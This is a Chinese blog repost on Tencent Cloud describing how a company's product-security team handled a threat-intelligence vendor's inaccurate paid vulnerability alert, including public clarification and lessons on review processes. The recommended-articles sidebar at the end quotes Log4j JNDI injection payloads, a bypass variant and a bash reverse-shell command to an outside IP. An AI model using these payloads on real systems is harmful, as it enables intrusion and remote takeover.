Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >面向情报公司付费信息的应急

面向情报公司付费信息的应急

作者头像
aerfa
发布于 2023-09-02 00:27:44
发布于 2023-09-02 00:27:44
17910
代码可运行
举报
运行总次数:0
代码可运行

在每一年的演习中,我们都会处置好几十起产品安全事件,虽然绝大多数都是已知的漏洞,但仍然有记录和总结的价值。另外身处应急响应大厅,还会收到来自前场几千同事传来的一手情报,他们犹如探针一样驻扎在客户侧进行防守,又或是攻击队员,在演习期间不间断的上报情报,可以帮助提升公司网络安全(安全部做出相应排查、加固和检测动作)和产品安全能力(产品线依据情报详情编写检测规则)。回顾历年写下的笔记,提炼出八个典型场景进行分享:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
1、面向情报公司付费信息的应急
2、面向互联网侧舆情信息的应急
3、客户侧产品推送样本事件处置
4、某邮箱被攻击情报的自我检查
5、办公网出口地址攻击客户蜜罐
6SRC白帽子突破边界进业务网
7、某部门下发零日漏洞确认函处置
8、公司溯源团队查到团队内部成员

本章为该系列的第七篇,亦是进入白热化战时状态的第1篇。面对从客户侧收到的我司产品漏洞情报,既要立即启动预先准备好的应急响应流程,更要超纲的摸清楚情报源头,从源头进行控制。

01

事件描述

某日,一线同事收到客户的询问:XX产品是不是存在漏洞,是什么类型的漏洞?我司部署的版本是不是受到影响?如果是的话,需要立即采取加固措施,得给我们协调工程师过来。

他随即按照PSIRT流程联系到产品应急组,产品应急组拉上交付二线、对应产线的产品安全专员和现场值班人员对此事件进行分析。

02

响应动作

经过研判,该客户不存在情报中提及的漏洞,回复客户即可。

但是该信息已经在外面传开了,需要发表公告对外进行澄清。

对于情报本身,追究其根源:原来是某威胁情报厂商根据我司发布的产品加固手册,反推出产品存在安全漏洞,并推送给其付费用户。

产品应急组评估此事需要向上同步,于是向相关高管进行汇报。经过高管与威胁情报厂商沟通并达成一致:后续再发我司产品漏洞情报时,先同步至PSIRT邮箱进行确认,信息准确后再推送给其客户。

03

处置结果

客户侧产品不受影响,外部舆情在发布澄清公告后也淡然褪去。(攻防演习期间的外部舆论,一般1-2天就会消退,就会出现新的热点漏洞或情报。)

04

经验总结

产品安全事件应急响应,无非就是两件事:一是漏洞研判及修复,纯技术的事儿一般会比较好做,出现安全事件就取证进行数据分析,若是历史漏洞则说明情况、点对点加固,若是新漏洞则出解决方案、根据风险等级铺向客户侧做加固;二是舆情控制,相对来说就比较棘手了,对于舆情发展态势的把控和处置动作,可能并不是SOP就能解决的,需要市场、法务等部门提供建议和领导的决策支持。在演习期间,对于处置时机和动作的判断,考验的是指挥官的智慧、反应力和全局视野。不过也有一些知识和经验是可以沉淀的:

  • 减少对外的暴露面:在演习前,一般会从客户侧控制台暴露面收敛、公司产品下载地址控制等方式,减少对外的暴露面。但从该事件来看,想到的方法还有待完善,对于产品的加固手册,也应该控制传播范围、并在变更说明等地方描述清楚修复的问题或缺陷,以免带来误会;
  • 关于发表对外声明:凡是遇到外部情报(产品漏洞或事件),一经确认就需要做好对外说法的准备,最终是否发布取决于外部舆情的传播情况;无论是内部发公众号还是外部通告,最终都会传播到外面,因此都把其视为外部传播;
  • 对外声明材料审核:最开始以为只需要产品升级公告、一句/段话式的说法给相关领导审核,但后来为了防止在加固手册中出现漏洞细节等信息,要求对加固手册也进行审核。总之,在演习期间为了保障少出事儿、不出事儿,对外的材料都需要经过把关;
  • 审核流程优化提效:审核的内容变多,领导的工作量也陡增,故从两方面来提升效率:①各类模板固化:专人将各类文档固化为模板,每个事件拿着模板来套,提升编写及审核速度;②优化审核流程:加固手册在审核前给交付二线进行审核,通过后才发到对外发声审核群;产品公告在审核前给专人进行审核,通过之后才发到对外发声审核群;
  • 公众号优于一句话:经过多年的摸索,通过一句话传播,可能出现内容歪曲或曲解。对外说法通过公众号来发布更好,内部可见、可截图给外部客户看,能够有效地控制舆论。
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-08-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 我的安全视界观 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
1 条评论
热度
最新
内容挺好,讲的挺详细,很实用,就是图片太过模糊,看不清。能发清晰些的图片吗
内容挺好,讲的挺详细,很实用,就是图片太过模糊,看不清。能发清晰些的图片吗
回复回复点赞举报
推荐阅读
编辑精选文章
换一批
log4j-CVE-2021-44228-vulhub复现
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2021/12/21
3.9K0
log4j-CVE-2021-44228-vulhub复现
记一次由log4j引发的渗透
索性用goby再去扫一下,应该是spring没错,但是没有漏洞是什么操作?联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架
红队蓝军
2022/02/05
1.2K1
记一次由log4j引发的渗透
Log4j-JNDI注入RCE
漏洞简介 影响版本 Apache Log4j 2.14.1 Apache Log4j Security Vulnerabilities log4shell - Quick Guide 漏洞利用 Log4j 2.14.1 - RCE CVE-2021-44228 POC ${jndi:ldap://xxx.dnslog.cn/exp} # Bypass ${j${lower:n}di:l${lower:d}ap://xxx.dnslog.cn/exp} RCE 首先Netcat监听端口 $ nc -lvn
Naraku
2022/02/24
1.9K0
Log4j-JNDI注入RCE
Log4j2 漏洞实战案例
在现在以及未来的一段时间里,Log4j2 漏洞依然是渗透和排查的重点。在测试靶场里复现多次,在实战中遇到还是十分兴奋,So,总得记录点什么吧。
Bypass
2022/04/19
1K0
Log4j2 漏洞实战案例
log4j远程代码执行漏洞原理详解及复现
JNDI: java命名和目录接口,通过访问JNDI,根据命名服务或目录服务来获取相应的资源。命名服务:键值对绑定key = value,通过键名检索值,RMI(远程方法调用)就是典型的命名服务。
红队蓝军
2024/08/01
9040
log4j远程代码执行漏洞原理详解及复现
Apache log4j2 远程命令执行漏洞复现
Apache log4j2 RCE漏洞(CVE-2021-44228)一出,各大行业知名厂商纷纷中招,与之前的fastjson、shiro漏洞相比更为严重,预计在之后的三四年中漏洞会一直存在。此漏洞影响范围特别广泛,漏洞利用门槛低,危害程度非常大,如果被攻击者恶意利用,危害程度不亚于2017年爆发的“永恒之蓝”漏洞。以下图片来源于网络
LuckySec
2022/11/02
4.9K0
Apache log4j2 远程命令执行漏洞复现
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
这里做一个复现学习的小文章,由于对java这方面的知识雀食是薄弱,而且本地复现时,出现了挺多问题,在本地复现时,不知道是什么原因,利用payload去打的时候,总是说loggxxx模块不存在...idea也犯毛病...果断直接用网上的靶机去复现一波
vFREE
2021/12/20
15.1K0
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
记一次log4j2引发的渗透
索性用goby再去扫一下,应该是spring没错,但是没有漏洞是什么操作?联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架
红队蓝军
2022/05/17
4410
记一次log4j2引发的渗透
Log4J漏洞本地快速复现
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2021/12/13
7K1
Log4J漏洞本地快速复现
Log4j2漏洞复现
由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。 https://mp.weixin.qq.com/s/15zcLEk6_x2enszhim9afA
R0A1NG
2022/02/19
2K0
Log4j2漏洞复现
log4j2(CVE-2021-44228)漏洞复现实操(小白向)
Apache Log4j 2 是对 Log4j 的升级,它比其前身 Log4j 1.x 提供了显着改进,并提供了 Logback 中可用的许多改进,同时修复了 Logback 架构中的一些固有问题。
网e渗透安全部
2022/06/15
6.7K0
log4j2(CVE-2021-44228)漏洞复现实操(小白向)
Apache Log4j 2远程代码执行漏洞
Apache Log4j是一个基于Java的日志记录工具。Log4j是几种Java日志框架之一。该项目在Apache接手后进行了代码重构,解决了框架中的架构问题并在Log4j 2中提供了一个插件架构,这使其更具扩展性。用户可以更为精确的对日志进行细粒度的控制,支持将日志信息发送到服务器、写入到文件或是发送给GUI组件等,通过定义日志信息的级别、输出格式,发送参数来对日志进行更完善的管理。
随心助手
2021/12/13
7130
Apache Log4j 2远程代码执行漏洞
史上最全 log4j2 远程命令执行漏洞汇总报告
2021 年 11 月 24 日,阿里云安全团队向 Apache 官方报告了 Apache Log4j2 远程代码执行漏洞,在 12 月 9 日被国外有人公开 POC,从而导致了一波安全从业人员的疯狂运动,甲方安全从业者加班加点修复漏洞;白帽子们疯狂扫描漏洞并提交 SRC,一度导致一些 SRC 发布公告暂停接收相关漏洞;而黑灰产们已经在自己的挖矿勒索武器库上增加了该漏洞的利用模块。为什么会这么疯狂?
信安之路
2021/12/15
9.2K0
史上最全 log4j2 远程命令执行漏洞汇总报告
记一次攻防演练打点过程
本文章或工具仅供安全研究使用,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,极致攻防实验室及文章作者不为此承担任何责任。
亿人安全
2023/10/18
3860
记一次攻防演练打点过程
log4j代码注入漏洞复现
前些天log4j官方宣布的log4j的漏洞闹得沸沸扬扬,各个公司加班升级修复,我们也在周末要求验证版本保证不受影响,既然知道了漏洞,我们就复现一下,比如让被注入文件的电脑关个机
余生大大
2022/11/02
5470
log4j代码注入漏洞复现
Apache Log4j2网络安全事件
echo -n 'bash -i >& /dev/tcp/123.180.208.153/7777 0>&1' | base64
MRy
2024/08/19
2290
Log4j 远程代码执行漏洞对 Flink 的影响和修复方案
为了了解这个 CVE-2021-44228 漏洞的影响,首先需要掌握一些 Java 概念。RMI 全称为 Remote Method Invocation,是 Java 提供的一种基于序列化的远程方法调用机制,可以通过网络通讯的方式,调用远程服务器提供的函数,就像在本地使用一样方便。在遥远的上古年代,微服务和 RESTful + JSON 等调用方式还没有出现和普及时,人们普遍使用 RMI 来实现远程服务请求。
KyleMeow
2021/12/14
2.1K1
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。
没事就要多学习
2024/07/18
2870
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
log4j 漏洞一些特殊的利用方式
之前曝了一个核弹级的漏洞“log4j RCE”,官方的修补方案也逐渐完善。本篇就拿 log4j 作为主题讲一下几个发现。
ghostsf
2022/09/09
1.9K0
log4j 漏洞一些特殊的利用方式
核弹级log4j命令注入漏洞复现(内附工具)
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2021/12/26
3.7K0
核弹级log4j命令注入漏洞复现(内附工具)
相关推荐
log4j-CVE-2021-44228-vulhub复现
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验